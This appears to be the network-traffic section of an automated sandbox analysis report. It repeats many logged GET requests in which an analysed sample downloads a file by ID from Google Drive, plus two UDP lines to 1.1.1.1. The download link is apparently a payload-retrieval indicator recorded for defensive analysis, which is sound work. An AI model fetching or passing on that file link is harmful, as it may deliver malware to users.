      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
